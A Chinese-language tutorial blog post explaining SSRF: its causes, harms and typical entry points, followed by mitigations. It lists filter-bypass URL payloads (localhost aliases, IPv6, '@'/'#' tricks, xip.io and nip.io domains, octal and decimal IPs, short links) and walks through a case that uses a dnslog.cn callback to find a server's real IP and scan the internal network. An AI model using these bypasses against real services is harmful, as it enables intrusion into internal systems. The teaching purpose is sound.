淺談SSRF(伺服器請求偽造)

  • 2020 年 3 月 10 日
  • 筆記

文章源自【位元組脈搏社區】-位元組脈搏實驗室

作者-Beginners

掃描下方二維碼進入社區:

0x01 淺談SSRF(伺服器請求偽造)

第一步,SSRF是怎麼產生的:

SSRF(Server-Side Request Forgery:伺服器端請求偽造) 是一種由攻擊者構造形成由服務端發起請求的一個安全漏洞。一般情況下,SSRF攻擊的目標是從外網無法訪問的內部系統。(正是因為它是由服務端發起的,所以它能夠請求到與它相連而與外網隔離的內部系統)

0x02 SSRF的危害:

1.可以對外網伺服器所在的內網、某些情況下埠的Banner會回顯出來 。

2.攻擊運行在內網或者本地的應用程式。

3.對內網web應用進行指紋識別 。

4.攻擊內外網的web應用。

5.利用file協議讀取本地文件等。

0x03 SSRF漏洞常見出現點:

1.遠程載入圖片

2.遠程下載

3.遠程讀取鏈接內容

4.掃描遠程地址

5.能夠對外發起網路請求的地方

6.請求遠程伺服器資源的地方

0x04 SSRF漏洞繞過:

一:利用本地繞過:

http://127.0.0.1:80 >>> http://127.0.0.1:80

http://localhost:80 >>> http://127.0.0.1:80

http://127.127.127.127 >>> http://127.0.0.1:80

http://127.0.0.3 >>> http://127.0.0.1:80

http://127.0.1.3 >>> http://127.0.0.1:80

二:利用[::]繞過localhost:

http://[::]:80 >>> http://127.0.0.1:80

http://[::1]:80 >>> http://127.0.0.1:80

三:利用#,@繞過:

http://[email protected] >>> http://127.0.0.1:80

http://127.0.0.1#@test.com >>> http://127.0.0.1:80

四:利用特殊域名來繞過:

http://127.0.0.1.xip.io >>> http://127.0.0.1:80

http://www.owasp.org.127.0.0.1.xip.io >>> http://127.0.0.1:80

https://127.0.0.1.nip.io >>> http://127.0.0.1:80

五:利用句號繞過:

http://127。0。0。1 >>> http://127.0.0.1:80

七:利用進位繞過:

http://0177.0.0.1 >>> http://127.0.0.1:80

http://3232235521 >>> http://192.168.0.1

http://3232235777 >>> http://192.168.1.1

八:利用短網址繞過:

http://985.so/jSRg >>> http://127.0.0.1:80

0x05 SSRF利用案例:

第一步,測試過程中,發現如下請求:

第二步,發現存在過濾,構造網址實現繞過:

構造:http://0b55c1.dnslog.cn#@www.test.com 成功繞過

第三步,到DNSLog獲取真實的IP:

第四步,利用獲取的IP批量探測內網主機和埠服務:

第五步,修復方式:

可以採取白名單,限制內網Ip。

對返回內容進行識別。

禁用一些不必要的協議。

統一錯誤資訊,避免用戶可以根據錯誤資訊來判斷遠端伺服器的埠狀態。

通知!

公眾號招募文章投稿小夥伴啦!只要你有技術有想法要分享給更多的朋友,就可以參與到我們的投稿計劃當中哦~感興趣的朋友公眾號首頁菜單欄點擊【商務合作-我要投稿】即可。期待大家的參與~